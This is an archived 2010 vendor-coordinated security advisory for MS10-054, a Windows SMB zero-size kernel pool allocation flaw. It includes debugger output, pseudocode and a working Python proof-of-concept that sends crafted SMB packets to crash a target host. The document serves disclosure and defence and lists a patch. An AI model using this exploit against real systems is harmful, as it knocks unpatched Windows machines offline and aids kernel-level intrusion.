what you don't know can hurt you

Microsoft SMB Server Zero Size Pool Allocation

Microsoft SMB Server Zero Size Pool Allocation
Posted Aug 13, 2010
Authored by laurent gaffie | Site stratsec.net

A vulnerability in the Windows kernel can be triggered via SMB in Microsoft Windows versions ranging from Windows 2000 through to Windows 7. This vulnerability allows an attacker to trigger a kernel pool corruption by sending a specially crafted SMB_COM_TRANSACTION2 request. Successful exploitation of this issue may result in remote code execution with kernel privileges, while failed attempts will result in a denial of service condition.

tags | exploit, remote, denial of service, kernel, code execution
systems | windows, 2k, 7
MD5 | 7da37b9742180e99589a08d84a405ff9

Microsoft SMB Server Zero Size Pool Allocation

Change Mirror Download
===============================================================================
stratsec Security Advisory: SS-2010-007 MS SMB Server Zero Size Pool Allocation
===============================================================================

Title: SS-2010-007 Microsoft SMB Server Zero Size Pool Allocation
Version: 1.0
Issue type: Pool Corruption
Affected vendor: Microsoft
Release date: 11/08/2010
Discovered by: Laurent GaffiƩ
Advisory by: Laurent GaffiƩ
Issue status: Patch available

===============================================================================

Summary
-------

A vulnerability in the Windows kernel can be triggered via SMB in Microsoft
Windows versions ranging from Windows 2000 through to Windows 7. This
vulnerability allows an attacker to trigger a kernel pool corruption by sending
a specially crafted SMB_COM_TRANSACTION2 request.Successful exploitation of
this issue may result in remote code execution with kernel privileges, while
failed attempts will result in a Denial of Service condition.Microsoft has
published a patch to resolve the issue


Technical details
-----------------

The following analysis has been performed on an up-to-date Windows 7 x86-32
system.The issue is triggered by sending a crafted SMB_COM_TRANSACTION2
request:
- The client connects to a SMB server with at least read privileges on this
share.
- The client constructs a malicious Trans2 "QUERY_FS_INFO Query FS Attribute
info" with the Max DataCount parameter set to 0.

During processing of the query, SrvSmbQueryFsInformation() from srv.sys will
call NtQueryVolumeInformationFile(FileFsSizeInformation) from ntoskrnl.exe
NtQueryVolumeInformationFile allocates a pool chunk with a size taken from an
unverified user input:

kd> nt!NtQueryVolumeInformationFile+0x3de:
82a5779c ff7514 push dword ptr [ebp+14h] ;User controlled
82a5779f 50 push eax
82a577a0 e85d1fe6ff call nt!ExAllocatePoolWithQuotaTag (828b9702)
82a577a5 eb23 jmp nt!NtQueryVolumeInformationFile+0x40c (82a577ca)
kd>

The actual code of the NtQueryVolumeInformationFile function looks like this:

NTSTATUS
NtQueryVolumeInformationFile(IN HANDLE FileHandle,
OUT PIO_STATUS_BLOCK IoStatusBlock,
OUT PVOID FileSystemInformation,
IN ULONG Length,
IN FS_INFORMATION_CLASS FileSystemInformationClass)
{

if (RequestorMode != KernelMode)
{
}

if (FileSystemInformationClass == FileFsDeviceInformation)
{
}

if (FileSystemInformationClass == FileFsDriverPathInformation)
{
PFILE_FS_DRIVER_PATH_INFORMATION Buffer, Source;
Source = (PFILE_FS_DRIVER_PATH_INFORMATION)FileSystemInformation;
Buffer = (PFILE_FS_DRIVER_PATH_INFORMATION)ExAllocatePoolWithQuota(NonPagedPool, Length);

RtlCopyMemory(Buffer, Source, Length);

NtStatus = IopGetDriverPathInformation(FileObject, Buffer, Length);

// [...]
if (Buffer) ExFreePool(Buffer);
}


// Issue;
//SystemBuffer, which is the buffer used for the I/O, can be allocated with
//a size of zero because of the lack of length sanity check.
//Later this buffer is used for various operations, which is the source of
//trouble when the I/O Manager tries to release the buffer.

Irp->AssociatedIrp.SystemBuffer = ExAllocatePoolWithQuota(NonPagedPool,
Length);
// This buffer is freed later by the Windows I/O Manager.
}



Impact
------

Successful attempts may allow code execution with kernel privileges, failed
attempts will result in a denial of service (B.S.O.D).

Affected products
-----------------

Windows:
- 2000
- XP
- 2003
- Vista
- 2008
- 7
- 2008R2



Proof of concept
----------------

#!/usr/bin/env python
import sys,struct,socket
from socket import *

if len(sys.argv)<=2:
print '#######################################################################'
print '# MS10-054 Proof Of Concept'
print '# Usage: python '+sys.argv[0]+' TARGET SHARE-NAME (No backslash)'
print '# Example: python '+sys.argv[0]+' 192.168.8.101 users'
print '#######################################################################\n\n'
sys.exit()

host = str(sys.argv[1]),445

packetnego = "\x00\x00\x00\x9a"
packetnego += "\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
packetnego += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc3\x15\x00\x00\x01\x3d"
packetnego += "\x00\x77\x00\x02\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50"
packetnego += "\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00\x02\x4d\x49\x43\x52"
packetnego += "\x4f\x53\x4f\x46\x54\x20\x4e\x45\x54\x57\x4f\x52\x4b\x53\x20\x33"
packetnego += "\x2e\x30\x00\x02\x44\x4f\x53\x20\x4c\x4d\x31\x2e\x32\x58\x30\x30"
packetnego += "\x32\x00\x02\x44\x4f\x53\x20\x4c\x41\x4e\x4d\x41\x4e\x32\x2e\x31"
packetnego += "\x00\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57\x6f"
packetnego += "\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61\x00\x02\x4e"
packetnego += "\x54\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00"

def tidpiduidfield(data):
all_=data[28:34]
return all_

def handle(data):
##Chained SMB commands; Session Setup AndX Request,Tree connect
if data[8:10] == "\x72\x00":
sharename = "\x00\x00\x5c\x5c\x5c"+str(sys.argv[2])+"\x00\x3f\x3f\x3f\x3f\x3f\x00"
packetsession = "\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00"
packetsession += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd5\x15\x01\x00\x81\x2f"
packetsession += "\x0d\x75\x00\x7a\x00\x68\x0b\x32\x00\x00\x00\x00\x00\x00\x00\x18"
packetsession += "\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x3d\x00\x01\x01\x01"
packetsession += "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
packetsession += "\x01\x01\x01\x01\x01\x59\x4f\x00\x57\x4f\x52\x4b\x47\x52\x4f\x55"
packetsession += "\x50\x00\x57\x69\x6e\x64\x6f\x77\x73\x20\x34\x2e\x30\x00\x57\x69"
packetsession += "\x6e\x64\x6f\x77\x73\x20\x34\x2e\x30\x00\x04\xff\x00\x00\x00\x00"
packetsession += "\x00\x01\x00"+struct.pack(">i", len(sharename))[3:4]+sharename
print "[+]Session Query sent"
return struct.pack(">i", len(packetsession))+packetsession

##Trans2, Request, QUERY_FS_INFO Query FS Attribute Info
if data[8:10] == "\x73\x00":
packetrans = "\x00\x00\x00\x46"
packetrans += "\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x01\xc8\x00\x00\x00\x00"
packetrans += "\x00\x00\x00\x00\x00\x00\x00\x00"+tidpiduidfield(data)+"\x13\x00"
packetrans += "\x0f\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
packetrans += "\x00\x00\x00\x02\x00\x44\x00\x00\x00\x46\x00\x01\x00\x03\x00\x05"
packetrans += "\x00\x00\x44\x20\x05\x01"
print "[+]Malformed Trans2 packet sent\n[+]The target should be down now"
return packetrans

def run():
s = socket(AF_INET, SOCK_STREAM)
s.connect(host)
s.settimeout(2)
s.send(packetnego)
print "[+]Negotiate Protocol Request sent"
try:
while True:
data = s.recv(1024)
s.send(handle(data))
except Exception:
pass
s.close()
run()

Solution
--------

Apply appropriate security patches published by Microsoft in advisory MS10-054.
Alternatively, configure a firewall to block SMB communications with untrusted
clients.

Response timeline
-----------------

* 11/02/2010 - Vendor notified
* 11/02/2010 - Vendor acknowledges the advisory
* 16/02/2010 - MSRC confirms issue on Windows 7.
* 26/02/2010 - MSRC provide a DC number and confirm the vulnerability across
Windows 2000 to Windows 7.
* 27/02/2010 - MSRC indicates vulnerability is to be categorised as post-auth
on all platforms and ask for confirmation. stratsec responds
with additional information.
* 11/03/2010 - MSRC confirms issue as a remote unauthenticated code execution
issue for pre-Windows Vista platforms and upgrades overall
bulletin severity to Critical
* 12/03/2010 - MSRC plan to release a patch in June 2010
* 30/04/2010 - MSRC push back the update to August 2010. stratsec agree on new
release date.
* 24/07/2010 - MSRC confirm the patch for August.
* 05/08/2010 - MSRC propose to give a vendor statement or review this advisory
* 05/08/2010 - stratsec request the CVE number and advisory link to MSRC, and
provide this advisory for review.
* 09/08/2010 - MSRC confirm the technical details of this advisory, and provide
the CVE and link details.
* 11/08/2010 - This advisory released.


References
----------

* Vendor advisory: http://www.microsoft.com/technet/security/Bulletin/MS10-054.mspx
* CVE item: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2550


===============================================================================

About stratsec
--------------
Stratsec, specialises in providing information security consulting and testing
services for government and commercial clients. Established in 2004, we are
now one of the leading independent information security companies in the
Australasian and SE-Asian region, with offices throughout Australia and in
Singapore and Malaysia.

For more information, please visit our website at http://www.stratsec.net/

===============================================================================
--
Message protected by MailGuard: e-mail anti-virus, anti-spam and content filtering.http://www.mailguard.com.au/mg

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

March 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    15 Files
  • 2
    Mar 2nd
    5 Files
  • 3
    Mar 3rd
    3 Files
  • 4
    Mar 4th
    25 Files
  • 5
    Mar 5th
    20 Files
  • 6
    Mar 6th
    16 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    12 Files
  • 9
    Mar 9th
    3 Files
  • 10
    Mar 10th
    4 Files
  • 11
    Mar 11th
    23 Files
  • 12
    Mar 12th
    12 Files
  • 13
    Mar 13th
    12 Files
  • 14
    Mar 14th
    19 Files
  • 15
    Mar 15th
    12 Files
  • 16
    Mar 16th
    3 Files
  • 17
    Mar 17th
    1 Files
  • 18
    Mar 18th
    15 Files
  • 19
    Mar 19th
    22 Files
  • 20
    Mar 20th
    14 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    17 Files
  • 23
    Mar 23rd
    1 Files
  • 24
    Mar 24th
    1 Files
  • 25
    Mar 25th
    16 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close